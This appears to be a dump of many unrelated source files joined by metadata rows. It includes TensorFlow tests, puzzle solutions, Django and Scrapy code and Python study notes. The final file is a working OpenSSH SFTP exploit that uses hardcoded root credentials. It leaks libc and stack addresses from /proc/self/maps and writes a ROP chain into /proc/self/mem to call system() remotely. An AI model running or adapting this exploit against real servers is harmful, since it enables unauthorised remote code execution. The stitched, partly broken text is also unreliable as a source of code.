    batch, seqlen, dim = 2, 16, 4
    inputs = tf.zeros([batch, seqlen, dim])
    paddings = tf.zeros([batch, seqlen])
    p = conformer_layer.LConvLayer.CommonParams(input_dim=dim, kernel_size=3)
    p.name = 'lconv_layer'
    l = p.Instantiate()
    outputs = l.FPropDefaultTheta(inputs, paddings)
    # TF1-style session run: only verifies the graph executes, not values.
    with self.session() as sess:
      tf.global_variables_initializer().run()
      out_vals = sess.run(outputs)
      print([x.shape for x in out_vals])
class ConformerLayerTest(test_utils.TestCase, parameterized.TestCase):
  """Smoke tests for the full Conformer block (attention + conv + FFN)."""

  def testBasic(self):
    """Builds a ConformerLayer with local attention and checks FProp runs."""
    batch, seqlen, dim, heads = 2, 32, 4, 2
    context = 2
    inputs = tf.zeros([batch, seqlen, dim])
    paddings = tf.zeros([batch, seqlen])
    p = conformer_layer.ConformerLayer.CommonParams(
        input_dim=dim,
        atten_num_heads=heads,
        # Left context includes the current position, hence the +1.
        atten_left_context=context + 1,
        atten_right_context=context,
        kernel_size=3,
        fflayer_hidden_dim=4 * dim)
    p.name = 'conformer_layer'
    l = p.Instantiate()
    outputs = l.FPropDefaultTheta(inputs, paddings)
    # TF1-style session run: only verifies the graph executes, not values.
    with self.session() as sess:
      tf.global_variables_initializer().run()
      out_vals = sess.run(outputs)
      print([x.shape for x in out_vals])
if __name__ == '__main__':
tf.test.main()
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
26d874b2ef1277e4f7bbc5a3c0743aa9e19204b1 | 03a2c1eb549a66cc0cff72857963eccb0a56031d | /acmicpc/3106_error.py | cb083621f22b76ceccfd3a96d9d3a794dbb5ccd7 | [] | no_license | nobe0716/problem_solving | c56e24564dbe3a8b7093fb37cd60c9e0b25f8e59 | cd43dc1eddb49d6b5965419e36db708c300dadf5 | refs/heads/master | 2023-01-21T14:05:54.170065 | 2023-01-15T16:36:30 | 2023-01-15T16:36:30 | 80,906,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,011 | py | class Employee:
def __init__(self, _id, _income, _boss):
self.id = _id
self.income = _income
self.boss = _boss
class EmployeeGroup:
    """Appears to represent a chain of employees dominated by one top earner.

    income   - the group's current (maximum) income
    employee - the employee holding that income
    bosses   - bosses absorbed into this group's chain
    """
    def __init__(self, _income, _employee, _bosses):
        self.income = _income
        self.employee = _employee
        self.bosses = _bosses
def raiseIncome(employee_group_mapping, newbie):
    """Insert *newbie* into the group structure and return how many bosses
    the resulting group dominates.

    NOTE(review): this file is a saved failing attempt ("3106_error.py");
    the comments below describe what the code does, not necessarily what
    the problem requires.
    """
    # If the direct boss heads its own group and earns less, the newbie
    # takes over that group.
    if employee_group_mapping[newbie.boss.id].employee.id == newbie.boss.id and employee_group_mapping[newbie.boss.id].income < newbie.income: # succeed
        employee_group = employee_group_mapping[newbie.boss.id]
        employee_group.employee = newbie
        employee_group.income = newbie.income
        employee_group.bosses.append(newbie.boss)
        # NOTE(review): in this branch employee_group_mapping[newbie.id] is
        # never set — confirm this is intentional.
    else:
        # Otherwise the newbie starts a fresh group of its own.
        employee_group = EmployeeGroup(newbie.income, newbie, [])
        employee_group_mapping[newbie.id] = employee_group
    # Walk up the management chain, absorbing poorer groups along the way.
    boss = newbie.boss
    while boss is not None:
        if boss not in employee_group.bosses:
            employee_group_of_boss = employee_group_mapping[boss.id]
            if employee_group_of_boss.income < employee_group.income:
                employee_group_mapping[boss.id] = employee_group
                employee_group.bosses.append(boss)
                if employee_group_of_boss.employee.id == boss.id:
                    # The boss headed its own group: merge it wholesale.
                    for e in employee_group_of_boss.bosses:
                        employee_group_mapping[e.id] = employee_group
                    employee_group.bosses += employee_group_of_boss.bosses
                    employee_group_of_boss.bosses.clear()
                else:
                    # The boss belonged to another group: detach it.
                    employee_group_of_boss.bosses.remove(boss)
        boss = boss.boss
    return len(employee_group.bosses)
n = int(input())
i = int(input())
employees = [Employee(0, i, None)]
employee_group_mapping = {0:EmployeeGroup(i, employees[0], [])}
for id in range(1, n + 1):
i, b = map(int, input().split())
newbie = Employee(id, i, employees[b])
employees.append(newbie)
print(raiseIncome(employee_group_mapping, newbie))
| [
"sunghyo.jung@navercorp.com"
] | sunghyo.jung@navercorp.com |
c7b4b3fd79a720c7e02837ac27eb2800a44b7f3b | 62587160029c7c79b5d11f16e8beae4afa1c4834 | /webpages/twittscrapper/twittscrapper/pipelines.py | c40b9ecfb6e783c3a0a00f5bcfd87a2b229e9d0b | [] | no_license | LukaszMalucha/Scrapy-Collection | b11dcf2c09f33d190e506559d978e4f3b77f9f5a | 586f23b90aa984c22ea8f84eba664db9649ed780 | refs/heads/master | 2022-12-14T15:06:00.868322 | 2021-07-27T12:09:07 | 2021-07-27T12:09:07 | 144,448,351 | 3 | 0 | null | 2022-11-22T03:16:19 | 2018-08-12T07:55:05 | Python | UTF-8 | Python | false | false | 294 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class TwittscrapperPipeline(object):
    """Default no-op Scrapy item pipeline."""
    def process_item(self, item, spider):
        # Returning the item unchanged keeps it flowing to later pipelines.
        return item
| [
"lucasmalucha@gmail.com"
] | lucasmalucha@gmail.com |
855708304e8f445cffbbbc23fa6d1429ec435a31 | fc85a54686e13e598541df14c472e8aa744e6713 | /tests/modules/extra/redis/mother/redis_domain_event_bus_mother.py | a60fb245abf48a044f881e381f7c89f8d93d7a1d | [
"MIT"
] | permissive | alice-biometrics/petisco | 63721751cd43e70825b161a5ece535c80d95b6fa | 771ebe5c69dc735b8f373c2e7303d3b4eb655044 | refs/heads/main | 2023-09-01T03:53:23.642042 | 2023-08-25T05:38:42 | 2023-08-25T05:38:42 | 217,555,512 | 42 | 2 | MIT | 2023-09-12T11:06:43 | 2019-10-25T14:48:10 | Python | UTF-8 | Python | false | false | 928 | py | from redis.client import Redis
from petisco.extra.redis import RedisDomainEventBus
from tests.modules.base.mothers.message_meta_mother import MessageMetaMother
from tests.modules.extra.rabbitmq.mother.defaults import (
DEFAULT_ORGANIZATION,
DEFAULT_SERVICE,
)
class RedisDomainEventBusMother:
    """Object-mother factory building RedisDomainEventBus fixtures for tests."""

    @staticmethod
    def default(redis_database: Redis) -> RedisDomainEventBus:
        # Bus with the default test organization and service identifiers.
        return RedisDomainEventBus(
            DEFAULT_ORGANIZATION, DEFAULT_SERVICE, redis_database=redis_database
        )

    @staticmethod
    def with_service(service: str, redis_database: Redis) -> RedisDomainEventBus:
        # Bus whose service name is supplied by the caller.
        return RedisDomainEventBus(
            DEFAULT_ORGANIZATION, service, redis_database=redis_database
        )

    @staticmethod
    def with_info_id(redis_database: Redis) -> RedisDomainEventBus:
        # Bus carrying message meta that includes info identifiers.
        return RedisDomainEventBus(
            DEFAULT_ORGANIZATION, DEFAULT_SERVICE, redis_database=redis_database
        ).with_meta(MessageMetaMother.with_meta_with_info())
| [
"noreply@github.com"
] | alice-biometrics.noreply@github.com |
7cc33ebc7a5a6efaa96b3f5637c6c092cbb63f0e | 4e30c855c253cc1d972d29e83edb9d5ef662d30a | /djangox_project/dashboard.py | eb9198581b4738fb580239ff7a68d3b04ec30954 | [
"MIT"
] | permissive | rajeshr188/django-onex | 8b531fc2f519d004d1da64f87b10ffacbd0f2719 | 0a190ca9bcf96cf44f7773686205f2c1f83f3769 | refs/heads/master | 2023-08-21T22:36:43.898564 | 2023-08-15T12:08:24 | 2023-08-15T12:08:24 | 163,012,755 | 2 | 0 | NOASSERTION | 2023-07-22T09:47:28 | 2018-12-24T17:46:35 | Python | UTF-8 | Python | false | false | 1,948 | py | from controlcenter import Dashboard, widgets
from django.db.models import Count, Sum
from contact.models import Customer
from sales.models import Invoice, Month, Receipt
class InvList(widgets.ItemList):
    """Dashboard widget listing invoices with their outstanding balance."""
    model = Invoice
    list_display = ("pk", "customer", "balance")
class Invoice_count(widgets.SingleBarChart):
    """Bar chart: number of invoices created per month."""
    # label and series
    values_list = ("month", "count_items")
    # Data source
    # queryset = Invoice.objects.extra(select={'date': 'DATE(created)'},order_by=['date']).values('date').annotate(count_items=Count('id'))
    queryset = (
        Invoice.objects.annotate(month=Month("created"))
        .values("month")
        .order_by("month")
        .annotate(count_items=Count("id"))
    )
    # limit_to = 10
class Invoice_cash_value(widgets.SingleBarChart):
    """Bar chart: total outstanding balance of Cash invoices per month."""
    # label and series
    values_list = ("month", "total")
    # Data source
    # queryset = Invoice.objects.extra(select={'date': 'DATE(created)'},order_by=['date']).values('date').annotate(count_items=Count('id'))
    queryset = (
        Invoice.objects.filter(balancetype="Cash")
        .annotate(month=Month("created"))
        .values("month")
        .order_by("month")
        .annotate(total=Sum("balance"))
    )
    # limit_to = 10
    def legend(self):
        # Displays labels in legend
        return [x for x, y in self.values]
class Invoice_metal_value(widgets.SingleBarChart):
    """Bar chart: total outstanding balance of Metal invoices per month.

    NOTE(review): unlike Invoice_cash_value this widget defines no legend().
    """
    # label and series
    values_list = ("month", "total")
    # Data source
    # queryset = Invoice.objects.extra(select={'date': 'DATE(created)'},order_by=['date']).values('date').annotate(count_items=Count('id'))
    queryset = (
        Invoice.objects.filter(balancetype="Metal")
        .annotate(month=Month("created"))
        .values("month")
        .order_by("month")
        .annotate(total=Sum("balance"))
    )
    # limit_to = 10
class MyDash(Dashboard):
    """Control-center dashboard wiring the invoice widgets together."""
    widgets = (InvList, Invoice_count, Invoice_cash_value, Invoice_metal_value)
| [
"rajeshrathodh@gmail.com"
] | rajeshrathodh@gmail.com |
8541223ee9f41ea6a340339066aea93077edc297 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sdssj_163723.59+311304.4/sdB_sdssj_163723.59+311304.4_lc.py | d7551b1104f4f2bde286e2ba13e3fff4fae60a31 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py | from gPhoton.gAperture import gAperture
def main():
    # Single gAperture NUV light-curve extraction for this sdB target;
    # skypos and aperture/annulus radii (degrees) are baked into the call.
    gAperture(band="NUV", skypos=[249.348292,31.217889], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_sdssj_163723.59+311304.4/sdB_sdssj_163723.59+311304.4_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
07ab7a01d4a5fca02f2117dc9fa9530abe06a1bb | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2_neat/16_0_2_sentinel_B.py | a41cfb9d61b9bf2318a0b766282b89ad303786f1 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 833 | py | import sys
def flip(inStr, end):
    """Invert the first end+1 signs of *inStr* ('+' <-> '-'); keep the tail."""
    flipped = ''.join('+' if ch == '-' else '-' for ch in inStr[:end + 1])
    return flipped + inStr[end + 1:]
def processRecord(inStr):
    """Return the minimum number of prefix flips to turn every sign into '+'.

    Equivalent to the original flip-until-clean simulation, but O(n) instead
    of O(n^2): each maximal run of equal signs costs exactly one flip, except
    a trailing run of '+', which costs none. That equals the number of
    adjacent differing pairs, plus one if the string ends in '-'.
    """
    s = inStr.strip()
    flips = 0
    for prev, cur in zip(s, s[1:]):
        if prev != cur:
            flips += 1
    if s and s[-1] == '-':
        flips += 1
    return flips
def processLine(fp, x):
    """Solve one test case (case number x) and print it in judge format."""
    result = processRecord(fp.readline())
    # Python 2 print statement (file also uses xrange below).
    print 'Case #{}: {}'.format(x, result)
def main():
    """Read the input file named on the command line and solve every case.

    First line is the case count; each following line is one record.
    """
    filename = sys.argv[1]
    try:
        fp = open(filename)
        records = int(fp.readline())
        for x in xrange(records):
            processLine(fp, x+1)
        fp.close()
    except Exception as e:
        # Report the error (Python 2 print statement), then re-raise.
        print e
        raise e
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
fdb4b8beb6788367b69cf674f43dbed29e7f26ed | 0b5be4b9162c19cf0d98972e52ce80aa8af47f0a | /High_Level_Coding_python3/7/7_3.py | 00a2b2d5a943d5ec99617a57f6fa2a786190cb36 | [] | no_license | Air-Zhuang/Test35 | 374c974a2a7693fff21be81278c1bb59a050f7ee | d9f92b7a025c91b7503f02afc896ac769f818a84 | refs/heads/master | 2021-06-19T12:36:13.383878 | 2019-09-21T08:02:43 | 2019-09-21T08:02:43 | 147,629,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,833 | py | '''
实现类似with的让对象支持上下文管理
'''
'''
实现上下文管理协议,需定义实例的__enter__,__exit__
方法,他们分别在with开始和结束时被调用
'''
from sys import stdin, stdout
import getpass
import telnetlib
from collections import deque
class TelnetClient:
    """Interactive telnet client usable as a context manager.

    On exit it closes the connection, appends the session's command history
    to history.txt, and — because __exit__ returns True — suppresses ANY
    exception raised inside the with-block.
    """

    def __init__(self, host, port=23):
        self.host = host
        self.port = port

    def __enter__(self):
        self.tn = telnetlib.Telnet(self.host, self.port)
        self.history = deque([])
        return self # must return self so "with ... as" binds the client

    def __exit__(self, exc_type, exc_value, exc_tb):
        print('IN __exit__', exc_type, exc_value, exc_tb)
        self.tn.close()
        self.tn = None
        # Persist the commands typed during this session.
        with open('history.txt', 'a') as f:
            f.writelines(self.history)
        # Returning True swallows every exception from the with-block.
        return True

    def login(self):
        """Perform the interactive login handshake (prompts on stdin)."""
        # user
        self.tn.read_until(b"login: ")
        user = input("Enter your remote account: ")
        self.tn.write(user.encode('utf8') + b"\n")
        # password
        self.tn.read_until(b"Password: ")
        password = getpass.getpass()
        self.tn.write(password.encode('utf8') + b"\n")
        out = self.tn.read_until(b'$ ')
        stdout.write(out.decode('utf8'))

    def interact(self):
        """Forward stdin lines to the remote shell until EOF, echoing output."""
        while True:
            cmd = stdin.readline()
            if not cmd:
                break
            self.history.append(cmd)
            self.tn.write(cmd.encode('utf8'))
            out = self.tn.read_until(b'$ ').decode('utf8')
            # Skip the echoed command itself before printing the output.
            stdout.write(out[len(cmd)+1:])
            stdout.flush()
# client = TelnetClient('192.168.0.105')
# client.connect()
# client.login()
# client.interact()
# client.cleanup()
with TelnetClient('192.168.0.105') as client:
raise Exception('TEST')
client.login()
client.interact()
print('END')
| [
"737248514@qq.com"
] | 737248514@qq.com |
e13861ef225236bfe4712ae37af04bc652f4bb50 | 1caa4080e82a6b18f7c2e52fea25b4e66c0b331b | /C3D-tensorflow-master/lstm.py | c46aa01205fcfec6f0b76e847fdc804da1a3c1e3 | [] | no_license | xixiareone/ouyangruo | 18dd0ae00e54f96ed3f61cd303f486c3c9c84de7 | 7605dbac97ed7ceeef92c14622aa0d7defb52bee | refs/heads/master | 2021-01-21T13:34:33.276346 | 2019-06-18T07:25:21 | 2019-06-18T07:25:21 | 40,350,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,509 | py | #!/usr/bin/env python
"""Evaluates the C3D network"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import math
import time
import tensorflow as tf
import numpy as np
import c3d_feature
import input_data
# Basic model parameters as external flags.
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_integer('gpu_num', 1,
"""How many GPUs to use""")
tf.app.flags.DEFINE_integer('batch_size', 10,
"""Batch size.""")
tf.app.flags.DEFINE_integer('eval_interval_secs', 60 * 5,
"""How often to run the eval.""")
tf.app.flags.DEFINE_string('checkpoint_dir', 'result',
"""Check point directory.""")
tf.app.flags.DEFINE_boolean('run_once', True,
"""Whether to run eval only once.""")
tf.app.flags.DEFINE_integer('num_examples', 5000,
"""Number of examples to run.""")
def placeholder_inputs(batch_size):
  """Generate placeholder variables to represent the input tensors.

  These placeholders are used as inputs by the rest of the model building
  code and will be fed from the downloaded data in the .run() loop, below.
  Clip geometry (frames, crop size, channels) comes from c3d_feature.

  Args:
    batch_size: The batch size will be baked into both placeholders.

  Returns:
    images_placeholder: Images placeholder.
    labels_placeholder: Labels placeholder.
  """
  # Note that the shapes of the placeholders match the shapes of the full
  # image and label tensors, except the first dimension is now batch_size
  # rather than the full size of the train or test data sets.
  images_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
                                                         c3d_feature.NUM_FRAMES_PER_CLIP,
                                                         c3d_feature.CROP_SIZE,
                                                         c3d_feature.CROP_SIZE,
                                                         c3d_feature.CHANNELS))
  labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
  return images_placeholder, labels_placeholder
def eval_once(saver, top_k_op, images_placeholder,
              labels_placeholder):
  """Run Eval once: restore the latest checkpoint and measure top-1 precision.

  Args:
    saver: Saver.
    top_k_op: Top K op.
    images_placeholder: placeholder fed with evaluation clips.
    labels_placeholder: placeholder fed with clip labels.
  """
  with tf.Session() as sess:
    ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)
    if ckpt and ckpt.model_checkpoint_path:
      # Restores from checkpoint
      saver.restore(sess, ckpt.model_checkpoint_path)
      # Assuming model_checkpoint_path looks something like:
      # /my-favorite-path/cifar10_train/model.ckpt-0,
      # extract global_step from it.
      # NOTE(review): global_step is extracted but never used below.
      global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]
    else:
      print('No checkpoint file found')
      return
    # Start the queue runners.
    coord = tf.train.Coordinator()
    try:
      threads = []
      for qr in tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS):
        threads.extend(qr.create_threads(sess, coord=coord, daemon=True,
                                         start=True))
      num_iter = int(math.ceil(FLAGS.num_examples / FLAGS.batch_size))
      true_count = 0  # Counts the number of correct predictions.
      total_sample_count = num_iter * FLAGS.batch_size
      step = 0
      while step < num_iter and not coord.should_stop():
        # Clips are loaded directly here (not via the queue runners).
        eval_images, eval_labels, _, _, _ = input_data.read_clip_and_label(
            filename='list/test.list',
            batch_size=FLAGS.batch_size,
            num_frames_per_clip=c3d_feature.NUM_FRAMES_PER_CLIP,
            crop_size=c3d_feature.CROP_SIZE,
            shuffle=True)
        predictions = sess.run([top_k_op],
                               feed_dict={
                                   images_placeholder: eval_images,
                                   labels_placeholder: eval_labels})
        true_count += np.sum(predictions)
        step += 1
        if step % 10 == 0:
          # NOTE(review): step/num_iter is integer-ish progress; this prints
          # 0 until the last step — probably meant int(step * 100 / num_iter).
          print("%i/100" % int(step/num_iter))
      # Compute precision @ 1.
      precision = true_count / total_sample_count
      print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
    except Exception as e:  # pylint: disable=broad-except
      coord.request_stop(e)
    coord.request_stop()
    coord.join(threads, stop_grace_period_secs=10)
def evaluate():
  """Build the C3D eval graph and run eval_once (repeatedly unless run_once)."""
  with tf.Graph().as_default() as g:
    # Get the image and the labels placeholder
    images_placeholder, labels_placeholder = placeholder_inputs(FLAGS.batch_size)
    # Build the Graph that computes the logits predictions from the inference
    # model.
    with tf.variable_scope('c3d_var'):
      logits = c3d_feature.inference_c3d(images_placeholder)
      top_k_op = tf.nn.in_top_k(logits, labels_placeholder, 1)
    # Restore the moving average version of the learned variables for eval.
    variable_averages = tf.train.ExponentialMovingAverage(
        c3d_feature.MOVING_AVERAGE_DECAY)
    variables_to_restore = variable_averages.variables_to_restore()
    saver = tf.train.Saver(variables_to_restore)
    while True:
      eval_once(saver, top_k_op, images_placeholder, labels_placeholder)
      if FLAGS.run_once:
        break
      time.sleep(FLAGS.eval_interval_secs)
time.sleep(FLAGS.eval_interval_secs)
def main(_):
  # Entry point for tf.app.run(); the parsed-argv argument is unused.
  evaluate()
if __name__ == '__main__':
tf.app.run()
| [
"noreply@github.com"
] | xixiareone.noreply@github.com |
f94d8cdd200a2667c1805cec6a55df31c3973965 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/AlipayBossFncAntbudgetReturnResponse.py | 3836054a78a576ebfb9a36c10cf8e6cab2ecc400 | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 1,229 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.BizActionLogDTO import BizActionLogDTO
class AlipayBossFncAntbudgetReturnResponse(AlipayResponse):
    """Response model for alipay.boss.fnc.antbudget.return."""

    def __init__(self):
        super(AlipayBossFncAntbudgetReturnResponse, self).__init__()
        self._result_data = None
        self._result_msg = None

    @property
    def result_data(self):
        return self._result_data

    @result_data.setter
    def result_data(self, value):
        # Accept either a ready DTO or its dict form from the gateway.
        self._result_data = value if isinstance(value, BizActionLogDTO) else BizActionLogDTO.from_alipay_dict(value)

    @property
    def result_msg(self):
        return self._result_msg

    @result_msg.setter
    def result_msg(self, value):
        self._result_msg = value

    def parse_response_content(self, response_content):
        response = super(AlipayBossFncAntbudgetReturnResponse, self).parse_response_content(response_content)
        # Route each present field through its property setter.
        for field in ('result_data', 'result_msg'):
            if field in response:
                setattr(self, field, response[field])
| [
"jiandong.jd@antfin.com"
] | jiandong.jd@antfin.com |
13979bc36eda56037d981c8724576dc7b10b6db5 | 7bb9bd2bdadef1590b2ef7ff309e08abf454e49d | /Resolução de problemas II/ListasTuplasDeicionários.py | 8665bcc291cd1e736c9ae453965659f17ca9745c | [] | no_license | ALREstevam/Curso-de-Python-e-Programacao-com-Python | afdf12717a710f20d4513d5df375ba63ba1e1c19 | af6227376736e63810e5979be54eb1c433d669ac | refs/heads/master | 2021-09-07T12:11:17.158298 | 2018-02-22T17:47:19 | 2018-02-22T17:47:19 | 87,453,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,982 | py | '''
Arrays são chamados de sequências
Tipos
String
s = 'texto'
Lista
São elementos mútáveis
Podem ter elementos de diferentes tipos
l = ['asa', 1]
Tupla
t = (1, 2, 3)
Tuplas e strings não são mutáveis
Mapping (relacionam chave ao valor)
Acesso
Com números positivos e negativos
0 1 2 3
[] [] [] []
-1 -2 -3 -4
Úteis
aList = []
for number in range(1,11):
aList += [number] #Adiciona elementos na listas
#Os dois elementos são listas
print(aList)
==============================================================
#Via elemento
for item in aList:
print(item) #imprime todos os elementos da lista
#Via índice
for i in range(len(aList)):
print(aList[i]) #imprime todos os elementos da lista
===============================================================
Histograma
values = [0] * 10 # cria uma lista com 10 valores iguais a zero
print('10 inteiros')
for i in range(10):
newValue = int(input('Valor: '))
for i in range(len(values)):
print(values[i] * '*')
==============================================================
Tuplas - lista que não pode ser mudada
currentHour = hour, minute, second
print(currentTime[0])
===============================================================
Desempacotar sequências
aString = 'abc'
first, second, third = aString
===============================================================
Slicing
sequencia[inicio : ]
sequencia[inicio : fim]
sequencia[ : fim]
sequencia[inicio : incremento : fim]
até fim-1
===============================================================
Dicionários
Coleção de valores associativos
Chave -> valor
dictionart = {}
dictionary = {1 : 'one', 2 : 'two'}
> Manipulando
nums = {1 : 'one', 2 : 'two'}
nums[3] = 'three' #adiciona ao dicionárioo
del nums[3] #removendo 3
nums[1] = 'ones' #alterando valor
===============================================================
Métodos = lista, tupla, dicionário (built-in types)
append(item) Insere item no final da lista
count( elemento ) Retorna o número de ocorrencias de elemento na lista.
extend( newList ) Insere os elementos de newList no final da lista
index( elemento ) Returna o indice da primeira ocorrência de elemento na lista
insert( indice, item ) Insere item na posição indice
pop( [indice] ) Sem parametro – remove e retorna o último elemento da lista. Se indice é especificado, remove e retorna o elemento na posição indice.
remove( elemento ) Remove a primeira ocorrencia de elemento da lista.
reverse() Inverte o conteúdo da lista
sort( [function] ) Ordena o conteúdo da lista.
===============================================================
Mpetodos de dicionário
clear() Apaga todos os item do dicionário
copy() Cria uma cópia do dicionário. Cópia referencia o dicionário original
get( key [, returnValue] ) Retorna o valor associado à chave. Se chave não está no dicionário e returnValue é dado, retorna-o.
has_key( key ) Returna 1 se a chave está no dicionário; 0 se não está.
items() Retorna uma lista de tuplas no formato chave-valor.
keys() Retorna uma lista das chaves do dicionário.
popitem() Remove e retorna um par arbitrário como uma tupla de dois elementos.
setdefault( key [,value] ) Se key não está no dicionário e value é especificado, insere o par key-value. Se value não é especificado, value é None.
update( newDictionary ) Adiciona todos pares chave-valor de newDictionary ao dicionário corrente e sobrescreve os valores para as chaves ja existentes.
values() Retorna uma lista de valores no dicionário.
for key in dicionario.keys():
from copy import deepcopy
copiaDistinta = deepcopy(dictionary)
'''
# NOTE(review): `list` shadows the built-in list type for the rest of the
# module; a name such as `letters` would be safer.
list = ['a','b','c']
list.remove('a')
print(list) | [
"a166348@g.unicamp.com"
] | a166348@g.unicamp.com |
150ef124e051307e4b1000fb4c14a1e6dd8b7691 | 3e44021a7b0c8753e5bb788897358573c21b34db | /apps/users/views.py | c18eb86f906f6002b0f896bae68afd84bb125702 | [] | no_license | DrMartiner/food_diary | e3d07c766aa4c65a9f3fcd6861cade9169442380 | ed5dca3a418247737c2bddbce16a52157cdb16eb | refs/heads/master | 2021-01-01T06:50:34.694745 | 2013-11-23T09:18:41 | 2013-11-23T09:18:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 151 | py | # -*- coding: utf-8 -*-
from django.views.generic import TemplateView
class MyProfileView(TemplateView):
template_name = 'users/my_profile.html' | [
"DrMartiner@GMail.Com"
] | DrMartiner@GMail.Com |
85abd7c55bb2a7aeaba405f4803e34ff03e22faf | 94012eacfd1661185dc78886b912a540dab8085a | /openssh/cve_2014_1692.py | 2be9968388b46486816df43baed506b75c7c25c1 | [] | no_license | sshayb/exploit_scripts | 41dc72095a27c5eb0f1370014cfb6bbcf8890e82 | 07755b2c0428187b7cb5f82bca8616735af86b32 | refs/heads/master | 2023-01-02T00:19:30.048200 | 2020-10-26T01:29:12 | 2020-10-26T01:29:12 | 227,637,487 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,627 | py | # OpenSSH <= 6.6 SFTP misconfiguration exploit for 32/64bit Linux
# The original discovery by Jann Horn: http://seclists.org/fulldisclosure/2014/Oct/35
#
# Adam Simuntis :: https://twitter.com/adamsimuntis
# Mindaugas Slusnys :: https://twitter.com/mislusnys
import paramiko
import sys
import time
#from pwn import *
# parameters
cmd = 'whoami'
host = '10.90.78.29'
port = 22
username = 'root'
password = 'secforce'

# connection
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname = host, port = port, username = username, password = password)
sftp = ssh.open_sftp()

# parse /proc/self/maps to get addresses
# NOTE(review): log/ELF/p32/p64 come from pwntools, but `from pwn import *`
# above is commented out, so the script fails as-is without restoring it.
log.info("Analysing /proc/self/maps on remote system")
sftp.get('/proc/self/maps','maps')
with open("maps","r") as f:
    lines = f.readlines()
    for line in lines:
        words = line.split()
        addr = words[0]
        if ("libc" in line and "r-xp" in line):
            path = words[-1]
            addr = addr.split('-')
            # 64-bit mappings print with more than 8 hex digits.
            BITS = 64 if len(addr[0]) > 8 else 32
            print "[+] {}bit libc mapped @ {}-{}, path: {}".format(BITS, addr[0], addr[1], path)
            libc_base = int(addr[0], 16)
            libc_path = path
        if ("[stack]" in line):
            addr = addr.split("-")
            saddr_start = int(addr[0], 16)
            saddr_end = int(addr[1], 16)
            print "[+] Stack mapped @ {}-{}".format(addr[0], addr[1])

# download remote libc and extract information
print "[+] Fetching libc from remote system..\n"
sftp.get(str(libc_path), 'libc.so')
e = ELF("libc.so")
sys_addr = libc_base + e.symbols['system']
exit_addr = libc_base + e.symbols['exit']

# gadgets for the RET slide and system()
if BITS == 64:
    pop_rdi_ret = libc_base + next(e.search('\x5f\xc3'))
    ret_addr = pop_rdi_ret + 1
else:
    ret_addr = libc_base + next(e.search('\xc3'))

print "\n[+] system() @ {}".format(hex(sys_addr))
print "[+] 'ret' @ {}".format(hex(ret_addr))
if BITS == 64:
    print "[+] 'pop rdi; ret' @ {}\n".format(hex(pop_rdi_ret))

with sftp.open('/proc/self/mem','rw') as f:
    if f.writable():
        print "[+] We have r/w permissions for /proc/self/mem! All Good."
    else:
        print "[-] Fatal error. No r/w permission for mem."
        sys.exit(0)
    log.info("Patching /proc/self/mem on the remote system")
    stack_size = saddr_end - saddr_start
    new_stack = ""
    print "[+] Pushing new stack to {}.. fingers crossed ;))".format(hex(saddr_start))
    #sleep(20)
    if BITS == 32:
        new_stack += p32(ret_addr) * (stack_size/4)
        new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-12]
        new_stack += p32(sys_addr)
        new_stack += p32(exit_addr)
        new_stack += p32(saddr_start)
    else:
        # 64-bit: pop rdi; ret gadget loads the command address, then system().
        new_stack += p64(ret_addr) * (stack_size/8)
        new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-32]
        new_stack += p64(pop_rdi_ret)
        new_stack += p64(saddr_start)
